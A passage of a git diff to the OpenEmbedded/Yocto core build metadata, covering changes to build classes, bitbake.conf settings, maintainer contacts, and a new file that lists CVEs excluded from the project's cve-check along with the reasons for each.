 	echo '# Only disable this check if you are absolutely know what you are doing!' >> $script
-	echo 'if [ ! -z "$LD_LIBRARY_PATH" ]; then' >> $script
+	echo 'if [ ! -z "${LD_LIBRARY_PATH:-}" ]; then' >> $script
 	echo "    echo \"Your environment is misconfigured, you probably need to 'unset LD_LIBRARY_PATH'\"" >> $script
 	echo "    echo \"but please check why this was set in the first place and that it's safe to unset.\"" >> $script
 	echo '    echo "The SDK will not operate correctly in most cases when LD_LIBRARY_PATH is set."' >> $script
@@ -44,7 +44,7 @@ toolchain_create_sdk_env_script () {
 	for i in ${CANADIANEXTRAOS}; do
 		EXTRAPATH="$EXTRAPATH:$sdkpathnative$bindir/${TARGET_ARCH}${TARGET_VENDOR}-$i"
 	done
-	echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':$PATH' >> $script
+	echo "export PATH=$sdkpathnative$bindir:$sdkpathnative$sbindir:$sdkpathnative$base_bindir:$sdkpathnative$base_sbindir:$sdkpathnative$bindir/../${HOST_SYS}/bin:$sdkpathnative$bindir/${TARGET_SYS}"$EXTRAPATH':"$PATH"' >> $script
 	echo 'export PKG_CONFIG_SYSROOT_DIR=$SDKTARGETSYSROOT' >> $script
 	echo 'export PKG_CONFIG_PATH=$SDKTARGETSYSROOT'"$libdir"'/pkgconfig:$SDKTARGETSYSROOT'"$prefix"'/share/pkgconfig' >> $script
 	echo 'export CONFIG_SITE=${SDKPATH}/site-config-'"${multimach_target_sys}" >> $script
diff --git a/meta/classes/uboot-extlinux-config.bbclass b/meta/classes/uboot-extlinux-config.bbclass
index f4bf94be04..be285daa01 100644
--- a/meta/classes/uboot-extlinux-config.bbclass
+++ b/meta/classes/uboot-extlinux-config.bbclass
@@ -153,5 +153,6 @@ python do_create_extlinux_config() {
 }
 UBOOT_EXTLINUX_VARS = "CONSOLE MENU_DESCRIPTION ROOT KERNEL_IMAGE FDTDIR FDT KERNEL_ARGS INITRD"
 do_create_extlinux_config[vardeps] += "${@' '.join(['UBOOT_EXTLINUX_%s_%s' % (v, l) for v in d.getVar('UBOOT_EXTLINUX_VARS').split() for l in d.getVar('UBOOT_EXTLINUX_LABELS').split()])}"
+do_create_extlinux_config[vardepsexclude] += "OVERRIDES"
 
 addtask create_extlinux_config before do_install do_deploy after do_compile
diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 1e19917a97..4d4f53ad4d 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
 UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
 
 UNINATIVE_URL ?= "unset"
-UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz"
+UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
 # Example checksums
 #UNINATIVE_CHECKSUM[aarch64] = "dead"
 #UNINATIVE_CHECKSUM[i686] = "dead"
@@ -34,6 +34,8 @@ python uninative_event_fetchloader() {
         with open(loaderchksum, "r") as f:
             readchksum = f.read().strip()
         if readchksum == chksum:
+            if "uninative" not in d.getVar("SSTATEPOSTUNPACKFUNCS"):
+                enable_uninative(d)
             return
 
     import subprocess
@@ -100,7 +102,7 @@ ${UNINATIVE_STAGING_DIR}-uninative/relocate_sdk.py \
   ${UNINATIVE_LOADER} \
   ${UNINATIVE_LOADER} \
   ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/${bindir_native}/patchelf-uninative \
-  ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so" % chksum)
+  ${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux${base_libdir_native}/libc*.so*" % chksum)
         subprocess.check_output(cmd, shell=True)
 
         with open(loaderchksum, "w") as f:
@@ -167,5 +169,7 @@ python uninative_changeinterp () {
             if not elf.isDynamic():
                 continue
 
+            os.chmod(f, s[stat.ST_MODE] | stat.S_IWUSR)
             subprocess.check_output(("patchelf-uninative", "--set-interpreter", d.getVar("UNINATIVE_LOADER"), f), stderr=subprocess.STDOUT)
+            os.chmod(f, s[stat.ST_MODE])
 }
diff --git a/meta/classes/useradd-staticids.bbclass b/meta/classes/useradd-staticids.bbclass
index 3a1b5f1320..908b24969f 100644
--- a/meta/classes/useradd-staticids.bbclass
+++ b/meta/classes/useradd-staticids.bbclass
@@ -41,7 +41,7 @@ def update_useradd_static_config(d):
     def handle_missing_id(id, type, pkg, files, var, value):
         # For backwards compatibility we accept "1" in addition to "error"
         error_dynamic = d.getVar('USERADD_ERROR_DYNAMIC')
-        msg = "%s - %s: %sname %s does not have a static ID defined." % (d.getVar('PN'), pkg, type, id)
+        msg = 'Recipe %s, package %s: %sname "%s" does not have a static ID defined.' % (d.getVar('PN'), pkg, type, id)
         if files:
             msg += " Add %s to one of these files: %s" % (id, files)
         else:
diff --git a/meta/classes/useradd.bbclass b/meta/classes/useradd.bbclass
index e5f3ba24f9..0f0ed3446d 100644
--- a/meta/classes/useradd.bbclass
+++ b/meta/classes/useradd.bbclass
@@ -230,6 +230,10 @@ fakeroot python populate_packages_prepend () {
         preinst += 'perform_useradd () {\n%s}\n' % d.getVar('perform_useradd')
         preinst += 'perform_groupmems () {\n%s}\n' % d.getVar('perform_groupmems')
         preinst += d.getVar('useradd_preinst')
+        # Expand out the *_PARAM variables to the package specific versions
+        for rep in ["GROUPADD_PARAM", "USERADD_PARAM", "GROUPMEMS_PARAM"]:
+            val = d.getVar(rep + "_" + pkg) or ""
+            preinst = preinst.replace("${" + rep + "}", val)
         d.setVar('pkg_preinst_%s' % pkg, preinst)
 
         # RDEPENDS setup
diff --git a/meta/classes/utils.bbclass b/meta/classes/utils.bbclass
index cd3d05709e..99f68f7505 100644
--- a/meta/classes/utils.bbclass
+++ b/meta/classes/utils.bbclass
@@ -233,7 +233,7 @@ create_cmdline_wrapper () {
 #!/bin/bash
 realpath=\`readlink -fn \$0\`
 realdir=\`dirname \$realpath\`
-exec -a \`dirname \$realpath\`/$cmdname \`dirname \$realpath\`/$cmdname.real $cmdoptions "\$@"
+exec -a \$realdir/$cmdname \$realdir/$cmdname.real $cmdoptions "\$@"
 END
 	chmod +x $cmd
 }
diff --git a/meta/classes/waf.bbclass b/meta/classes/waf.bbclass
index 900244004e..8fa5063645 100644
--- a/meta/classes/waf.bbclass
+++ b/meta/classes/waf.bbclass
@@ -1,10 +1,19 @@
 # avoids build breaks when using no-static-libs.inc
 DISABLE_STATIC = ""
 
+# What Python interpretter to use.  Defaults to Python 3 but can be
+# overridden if required.
+WAF_PYTHON ?= "python3"
+
 B = "${WORKDIR}/build"
 
 EXTRA_OECONF_append = " ${PACKAGECONFIG_CONFARGS}"
 
+EXTRA_OEWAF_BUILD ??= ""
+# In most cases, you want to pass the same arguments to `waf build` and `waf
+# install`, but you can override it if necessary
+EXTRA_OEWAF_INSTALL ??= "${EXTRA_OEWAF_BUILD}"
+
 def waflock_hash(d):
     # Calculates the hash used for the waf lock file. This should include
     # all of the user controllable inputs passed to waf configure. Note
@@ -35,9 +44,10 @@ python waf_preconfigure() {
     import subprocess
     from distutils.version import StrictVersion
     subsrcdir = d.getVar('S')
+    python = d.getVar('WAF_PYTHON')
     wafbin = os.path.join(subsrcdir, 'waf')
     try:
-        result = subprocess.check_output([wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
+        result = subprocess.check_output([python, wafbin, '--version'], cwd=subsrcdir, stderr=subprocess.STDOUT)
         version = result.decode('utf-8').split()[1]
         if StrictVersion(version) >= StrictVersion("1.8.7"):
             d.setVar("WAF_EXTRA_CONF", "--bindir=${bindir} --libdir=${libdir}")
@@ -50,16 +60,16 @@ python waf_preconfigure() {
 do_configure[prefuncs] += "waf_preconfigure"
 
 waf_do_configure() {
-	(cd ${S} && ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
+	(cd ${S} && ${WAF_PYTHON} ./waf configure -o ${B} --prefix=${prefix} ${WAF_EXTRA_CONF} ${EXTRA_OECONF})
 }
 
 do_compile[progress] = "outof:^\[\s*(\d+)/\s*(\d+)\]\s+"
 waf_do_compile()  {
-	(cd ${S} && ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)})
+	(cd ${S} && ${WAF_PYTHON} ./waf build ${@oe.utils.parallel_make_argument(d, '-j%d', limit=64)} ${EXTRA_OEWAF_BUILD})
 }
 
 waf_do_install() {
-	(cd ${S} && ./waf install --destdir=${D})
+	(cd ${S} && ${WAF_PYTHON} ./waf install --destdir=${D} ${EXTRA_OEWAF_INSTALL})
 }
 
 EXPORT_FUNCTIONS do_configure do_compile do_install
diff --git a/meta/conf/abi_version.conf b/meta/conf/abi_version.conf
index 2bdc55695b..35faef9a36 100644
--- a/meta/conf/abi_version.conf
+++ b/meta/conf/abi_version.conf
@@ -4,7 +4,7 @@
 # that breaks the format and have been previously discussed on the mailing list 
 # with general agreement from the core team.
 #
-OELAYOUT_ABI = "12"
+OELAYOUT_ABI = "14"
 
 #
 # HASHEQUIV_HASH_VERSION is injected into the output hash calculation used by
@@ -12,4 +12,4 @@ OELAYOUT_ABI = "12"
 # a reset of the equivalence, for example when reproducibility issues break the
 # existing match data. Distros can also append to this value for the same effect.
 #
-HASHEQUIV_HASH_VERSION  = "1"
+HASHEQUIV_HASH_VERSION  = "5"
diff --git a/meta/conf/bitbake.conf b/meta/conf/bitbake.conf
index bdade79abe..457b7790c2 100644
--- a/meta/conf/bitbake.conf
+++ b/meta/conf/bitbake.conf
@@ -208,6 +208,7 @@ PF = "${PN}-${EXTENDPE}${PV}-${PR}"
 EXTENDPE = "${@['','${PE}_'][int(d.getVar('PE') or 0) > 0]}"
 P = "${PN}-${PV}"
 
+PRSERV_PV_AUTOINC = "AUTOINC"
 PRAUTO = ""
 EXTENDPRAUTO = "${@['.${PRAUTO}', ''][not d.getVar('PRAUTO')]}"
 PRAUTOINX = "${PF}"
@@ -420,8 +421,10 @@ PKGDATA_DIR = "${TMPDIR}/pkgdata/${MACHINE}"
 
 SDK_NAME_PREFIX ?= "oecore"
 SDK_NAME = "${SDK_NAME_PREFIX}-${SDK_ARCH}-${TUNE_PKGARCH}"
-SDKPATH = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
+SDKPATH = "/usr/local/oe-sdk-hardcoded-buildpath"
 SDKPATHNATIVE = "${SDKPATH}/sysroots/${SDK_SYS}"
+# The path to default to installing the SDK to
+SDKPATHINSTALL = "/usr/local/${SDK_NAME_PREFIX}-${SDK_ARCH}"
 
 ##################################################################
 # Kernel info.
@@ -479,7 +482,7 @@ export PATH
 # Build utility info.
 ##################################################################
 
-# Directory where host tools are copied
+# Directory with symlinks to host tools used by build
 HOSTTOOLS_DIR = "${TMPDIR}/hosttools"
 
 # Tools needed to run builds with OE-Core
@@ -499,7 +502,7 @@ HOSTTOOLS += " \
 HOSTTOOLS += "${@'ip ping ps scp ssh stty' if (bb.utils.contains_any('IMAGE_CLASSES', 'testimage testsdk', True, False, d) or any(x in (d.getVar("BBINCLUDED") or "") for x in ["testimage.bbclass", "testsdk.bbclass"])) else ''}"
 
 # Link to these if present
-HOSTTOOLS_NONFATAL += "aws gcc-ar gpg ld.bfd ld.gold nc pigz sftp socat ssh sudo"
+HOSTTOOLS_NONFATAL += "aws gcc-ar gpg gpg-agent ld.bfd ld.gold nc pigz sftp socat ssh sudo"
 
 # Temporary add few more detected in bitbake world
 HOSTTOOLS_NONFATAL += "join nl size yes zcat"
@@ -638,7 +641,7 @@ APACHE_MIRROR = "https://archive.apache.org/dist"
 DEBIAN_MIRROR = "http://ftp.debian.org/debian/pool"
 GENTOO_MIRROR = "http://distfiles.gentoo.org/distfiles"
 GNOME_GIT = "git://gitlab.gnome.org/GNOME"
-GNOME_MIRROR = "https://ftp.gnome.org/pub/GNOME/sources"
+GNOME_MIRROR = "https://download.gnome.org/sources/"
 GNU_MIRROR = "https://ftp.gnu.org/gnu"
 GNUPG_MIRROR = "https://www.gnupg.org/ftp/gcrypt"
 GPE_MIRROR = "http://gpe.linuxtogo.org/download/source"
@@ -686,13 +689,18 @@ SRC_URI = ""
 PSEUDO_LOCALSTATEDIR ?= "${WORKDIR}/pseudo/"
 PSEUDO_PASSWD ?= "${STAGING_DIR_TARGET}:${PSEUDO_SYSROOT}"
 PSEUDO_SYSROOT = "${COMPONENTS_DIR}/${BUILD_ARCH}/pseudo-native"
+PSEUDO_IGNORE_PATHS = "/usr/,/etc/,/lib,/dev/,/run/,${T},${WORKDIR}/recipe-sysroot,${SSTATE_DIR},${STAMPS_DIR}"
+PSEUDO_IGNORE_PATHS .= ",${TMPDIR}/sstate-control,${TMPDIR}/buildstats,${TMPDIR}/sysroots-components,${TMPDIR}/pkgdata"
+PSEUDO_IGNORE_PATHS .= ",${WORKDIR}/deploy-,${WORKDIR}/sstate-build-package_,${WORKDIR}/sstate-install-package_,${WORKDIR}/pkgdata-sysroot"
+PSEUDO_IGNORE_PATHS .= ",${DEPLOY_DIR},${BUILDHISTORY_DIR},${TOPDIR}/cache,${COREBASE}/scripts,${CCACHE_DIR}"
+
 export PSEUDO_DISABLED = "1"
 #export PSEUDO_PREFIX = "${STAGING_DIR_NATIVE}${prefix_native}"
 #export PSEUDO_BINDIR = "${STAGING_DIR_NATIVE}${bindir_native}"
 #export PSEUDO_LIBDIR = "${STAGING_DIR_NATIVE}$PSEUDOBINDIR/../lib/pseudo/lib
-FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_DISABLED=1"
+FAKEROOTBASEENV = "PSEUDO_BINDIR=${PSEUDO_SYSROOT}${bindir_native} PSEUDO_LIBDIR=${PSEUDO_SYSROOT}${prefix_native}/lib/pseudo/lib PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=1 PYTHONDONTWRITEBYTECODE=1"
 FAKEROOTCMD = "${PSEUDO_SYSROOT}${bindir_native}/pseudo"
-FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_DISABLED=0"
+FAKEROOTENV = "PSEUDO_PREFIX=${PSEUDO_SYSROOT}${prefix_native} PSEUDO_LOCALSTATEDIR=${PSEUDO_LOCALSTATEDIR} PSEUDO_PASSWD=${PSEUDO_PASSWD} PSEUDO_NOSYMLINKEXP=1 PSEUDO_IGNORE_PATHS=${@oe.path.canonicalize(d.getVar('PSEUDO_IGNORE_PATHS'))} PSEUDO_DISABLED=0"
 FAKEROOTNOENV = "PSEUDO_UNLOAD=1"
 FAKEROOTDIRS = "${PSEUDO_LOCALSTATEDIR}"
 PREFERRED_PROVIDER_virtual/fakeroot-native ?= "pseudo-native"
@@ -874,8 +882,8 @@ BB_CONSOLELOG ?= "${LOG_DIR}/cooker/${MACHINE}/${DATETIME}.log"
 
 # Setup our default hash policy
 BB_SIGNATURE_HANDLER ?= "OEBasicHash"
-BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
-    SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
+BB_HASHEXCLUDE_COMMON ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DIR \
+    THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \
     USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \
     STAMPS_DIR PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \
     CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_NOHASHDIR LICENSE_PATH SDKPKGSUFFIX \
@@ -883,12 +891,13 @@ BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH BBSERVER DL_DI
     BB_WORKERCONTEXT BB_LIMITEDDEPS BB_UNIHASH extend_recipe_sysroot DEPLOY_DIR \
     SSTATE_HASHEQUIV_METHOD SSTATE_HASHEQUIV_REPORT_TASKDATA \
     SSTATE_HASHEQUIV_OWNER CCACHE_TOP_DIR BB_HASHSERVE GIT_CEILING_DIRECTORIES"
-BB_HASHCONFIG_WHITELIST ?= "${BB_HASHBASE_WHITELIST} DATE TIME SSH_AGENT_PID \
+BB_HASHBASE_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} PSEUDO_IGNORE_PATHS BUILDHISTORY_DIR SSTATE_DIR "
+BB_HASHCONFIG_WHITELIST ?= "${BB_HASHEXCLUDE_COMMON} DATE TIME SSH_AGENT_PID \
     SSH_AUTH_SOCK PSEUDO_BUILD BB_ENV_EXTRAWHITE DISABLE_SANITY_CHECKS \
     PARALLEL_MAKE BB_NUMBER_THREADS BB_ORIGENV BB_INVALIDCONF BBINCLUDED \
     GIT_PROXY_COMMAND ALL_PROXY all_proxy NO_PROXY no_proxy FTP_PROXY ftp_proxy \
     HTTP_PROXY http_proxy HTTPS_PROXY https_proxy SOCKS5_USER SOCKS5_PASSWD \
-    BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT"
+    BB_SETSCENE_ENFORCE BB_CMDLINE BB_SERVER_TIMEOUT BB_NICE_LEVEL"
 BB_SIGNATURE_EXCLUDE_FLAGS ?= "doc deps depends \
     lockfiles type vardepsexclude vardeps vardepvalue vardepvalueexclude \
     file-checksums python func task export unexport noexec nostamp dirs cleandirs \
diff --git a/meta/conf/distro/include/cve-extra-exclusions.inc b/meta/conf/distro/include/cve-extra-exclusions.inc
new file mode 100644
index 0000000000..f3490db9dd
--- /dev/null
+++ b/meta/conf/distro/include/cve-extra-exclusions.inc
@@ -0,0 +1,75 @@
+# This file contains a list of CVE's where resolution has proven to be impractical
+# or there is no reasonable action the Yocto Project can take to resolve the issue.
+# It contains all the information we are aware of about an issue and analysis about
+# why we believe it can't be fixed/handled. Additional information is welcome through
+# patches to the file.
+#
+# Include this file in your local.conf or distro.conf to exclude these CVE's
+# from the cve-check results or add to the bitbake command with:
+#     -R conf/distro/include/cve-extra-exclusions.inc
+#
+# The file is not included by default since users should review this data to ensure
+# it matches their expectations and usage of the project.
+#
+# We may also include "in-flight" information about current/ongoing CVE work with
+# the aim of sharing that work and ensuring we don't duplicate it.
+#
+
+
+# strace https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0006
+# CVE is more than 20 years old with no resolution evident
+# broken links in CVE database references make resolution impractical
+CVE_CHECK_WHITELIST += "CVE-2000-0006"
+
+# epiphany https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0238
+# The issue here is spoofing of domain names using characters from other character sets.
+# There has been much discussion amongst the epiphany and webkit developers and
+# whilst there are improvements about how domains are handled and displayed to the user
+# there is unlikely ever to be a single fix to webkit or epiphany which addresses this
+# problem. Whitelisted as there isn't any mitigation or fix or way to progress this further
+# we can seem to take.
+CVE_CHECK_WHITELIST += "CVE-2005-0238"
+
+# glibc https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4756
+# Issue is memory exhaustion via glob() calls, e.g. from within an ftp server
+# Best discussion in https://bugzilla.redhat.com/show_bug.cgi?id=681681
+# Upstream don't see it as a security issue, ftp servers shouldn't be passing
+# this to libc glob. Exclude as upstream have no plans to add BSD's GLOB_LIMIT or similar
+CVE_CHECK_WHITELIST += "CVE-2010-4756"
+
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29509
+# go https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-29511
+# The encoding/xml package in go can potentially be used for security exploits if not used correctly
+# CVE applies to a netapp product as well as flagging a general issue. We don't ship anything
+# exposing this interface in an exploitable way
+CVE_CHECK_WHITELIST += "CVE-2020-29509 CVE-2020-29511"
+
+# db
+# Since Oracle relicensed bdb, the open source community is slowly but surely replacing bdb with
+# supported and open source friendly alternatives. As a result these CVEs are unlikely to ever be fixed.
+CVE_CHECK_WHITELIST += "CVE-2015-2583 CVE-2015-2624 CVE-2015-2626 CVE-2015-2640 CVE-2015-2654 \
+CVE-2015-2656 CVE-2015-4754 CVE-2015-4764 CVE-2015-4774 CVE-2015-4775 CVE-2015-4776 CVE-2015-4777 \
+CVE-2015-4778 CVE-2015-4779 CVE-2015-4780 CVE-2015-4781 CVE-2015-4782 CVE-2015-4783 CVE-2015-4784 \
+CVE-2015-4785 CVE-2015-4786 CVE-2015-4787 CVE-2015-4788 CVE-2015-4789 CVE-2015-4790 CVE-2016-0682 \
+CVE-2016-0689 CVE-2016-0692 CVE-2016-0694 CVE-2016-3418 CVE-2020-2981"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20255
+# There was a proposed patch https://lists.gnu.org/archive/html/qemu-devel/2021-02/msg06098.html
+# qemu maintainers say the patch is incorrect and should not be applied
+# Ignore from OE's perspectivee as the issue is of low impact, at worst sitting in an infinite loop rather than exploitable
+CVE_CHECK_WHITELIST += "CVE-2021-20255"
+
+# qemu:qemu-native:qemu-system-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12067
+# There was a proposed patch but rejected by upstream qemu. It is unclear if the issue can
+# still be reproduced or where exactly any bug is.
+# Ignore from OE's perspective as we'll pick up any fix when upstream accepts one.
+CVE_CHECK_WHITELIST += "CVE-2019-12067"
+
+# nasm:nasm-native https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-18974
+# It is a fuzzing related buffer overflow. It is of low impact since most devices
+# wouldn't expose an assembler. The upstream is inactive and there is little to be
+# done about the bug, ignore from an OE perspective.
+CVE_CHECK_WHITELIST += "CVE-2020-18974"
+
+
+
diff --git a/meta/conf/distro/include/default-distrovars.inc b/meta/conf/distro/include/default-distrovars.inc
index 433d4b6651..038acc1504 100644
--- a/meta/conf/distro/include/default-distrovars.inc
+++ b/meta/conf/distro/include/default-distrovars.inc
@@ -47,5 +47,5 @@ KERNEL_IMAGETYPES ??= "${KERNEL_IMAGETYPE}"
 # The CONNECTIVITY_CHECK_URIS are used to test whether we can succesfully
 # fetch from the network (and warn you if not). To disable the test set
 # the variable to be empty.
-# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master
-CONNECTIVITY_CHECK_URIS ?= "https://www.example.com/"
+# Git example url: git://git.yoctoproject.org/yocto-firewall-test;protocol=git;rev=master;branch=master
+CONNECTIVITY_CHECK_URIS ?= "https://yoctoproject.org/connectivity.html"
diff --git a/meta/conf/distro/include/maintainers.inc b/meta/conf/distro/include/maintainers.inc
index ff962a3be9..11a35a2c59 100644
--- a/meta/conf/distro/include/maintainers.inc
+++ b/meta/conf/distro/include/maintainers.inc
@@ -4,7 +4,7 @@
 #
 # Please submit any patches against recipes in meta to the
 # OE-Core mail list (openembedded-core@lists.openembedded.org)
-# For recipes in meta-yocto please use the Poky list (poky@yoctoproject.org)
+# For recipes in meta-yocto please use the Poky list (poky@lists.yoctoproject.org)
 #
 # If you have problems with or questions about a particular recipe, feel
 # free to contact the maintainer directly (cc:ing the appropriate mailing list
@@ -88,8 +88,8 @@ RECIPE_MAINTAINER_pn-builder = "Richard Purdie <richard.purdie@linuxfoundation.o
 RECIPE_MAINTAINER_pn-buildtools-extended-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
 RECIPE_MAINTAINER_pn-buildtools-tarball = "Richard Purdie <richard.purdie@linuxfoundation.org>"
 RECIPE_MAINTAINER_pn-busybox = "Andrej Valek <andrej.valek@siemens.com>"
-RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-busybox-inittab = "Denys Dmytriyenko <denys@denix.org>"
+RECIPE_MAINTAINER_pn-bzip2 = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-ca-certificates = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-cairo = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-cantarell-fonts = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -125,7 +125,7 @@ RECIPE_MAINTAINER_pn-core-image-sato-dev = "Richard Purdie <richard.purdie@linux
 RECIPE_MAINTAINER_pn-core-image-sato-ptest-fast = "Richard Purdie <richard.purdie@linuxfoundation.org>"
 RECIPE_MAINTAINER_pn-core-image-sato-sdk-ptest = "Richard Purdie <richard.purdie@linuxfoundation.org>"
 RECIPE_MAINTAINER_pn-coreutils = "Chen Qi <Qi.Chen@windriver.com>"
-RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-cpio = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-cracklib = "Armin Kuster <akuster808@gmail.com>"
 RECIPE_MAINTAINER_pn-createrepo-c = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-cronie = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -194,7 +194,7 @@ RECIPE_MAINTAINER_pn-gcc-cross-canadian-${TRANSLATED_TARGET_ARCH} = "Khem Raj <r
 RECIPE_MAINTAINER_pn-gcc-crosssdk-${SDK_SYS} = "Khem Raj <raj.khem@gmail.com>"
 RECIPE_MAINTAINER_pn-gcc-runtime = "Khem Raj <raj.khem@gmail.com>"
 RECIPE_MAINTAINER_pn-gcc-sanitizers = "Khem Raj <raj.khem@gmail.com>"
-RECIPE_MAINTAINER_pn-gcc-source-9.3.0 = "Khem Raj <raj.khem@gmail.com>"
+RECIPE_MAINTAINER_pn-gcc-source-9.5.0 = "Khem Raj <raj.khem@gmail.com>"
 RECIPE_MAINTAINER_pn-gconf = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-gcr = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-gdb = "Khem Raj <raj.khem@gmail.com>"
@@ -233,7 +233,7 @@ RECIPE_MAINTAINER_pn-gobject-introspection = "Alexander Kanavin <alex.kanavin@gm
 RECIPE_MAINTAINER_pn-gperf = "Alexander Kanavin <alex.kanavin@gmail.com>"
 RECIPE_MAINTAINER_pn-gpgme = "Hongxu Jia <hongxu.jia@windriver.com>"
 RECIPE_MAINTAINER_pn-gptfdisk = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-grep = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-groff = "Hongxu Jia <hongxu.jia@windriver.com>"
 RECIPE_MAINTAINER_pn-grub = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-grub-bootconf = "Anuj Mittal <anuj.mittal@intel.com>"
@@ -254,9 +254,9 @@ RECIPE_MAINTAINER_pn-gstreamer1.0-rtsp-server = "Anuj Mittal <anuj.mittal@intel.
 RECIPE_MAINTAINER_pn-gstreamer1.0-vaapi = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-gtk+3 = "Ross Burton <ross.burton@arm.com>"
 RECIPE_MAINTAINER_pn-gtk-doc = "Alexander Kanavin <alex.kanavin@gmail.com>"
-RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-gzip = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-harfbuzz = "Anuj Mittal <anuj.mittal@intel.com>"
-RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@ti.com>"
+RECIPE_MAINTAINER_pn-hdparm = "Denys Dmytriyenko <denys@denix.org>"
 RECIPE_MAINTAINER_pn-help2man-native = "Hongxu Jia <hongxu.jia@windriver.com>"
 RECIPE_MAINTAINER_pn-hicolor-icon-theme = "Anuj Mittal <anuj.mittal@intel.com>"
 RECIPE_MAINTAINER_pn-hwlatdetect = "Alexander Kanavin <alex.kanavin@gmail.com>"
@@ -454,10 +454,10 @@ RECIPE_MAINTAINER_pn-ltp = "Yi Zhao <yi.zhao@windriver.com>"
 RECIPE_MAINTAINER_pn-lttng-modules = "Richard Purdie <richard.purdie@linuxfoundation.org>"
 RECIPE_MAINTAINER_pn-lttng-tools = "Richard Purdie <richard.purdie@linuxfoundation.org>"
 RECIPE_MAINTAINER_pn-lttng-ust = "Richard Purdie <richard.purdie@linuxfoundation.org>"
-RECIPE_MAINTAINER_pn-lz4 = "Denys Dmytriyenko <denys@ti.com>"
-RECIPE_MAINTAINER_pn-lzo = "Denys Dmytriyenko <denys@ti.com>"
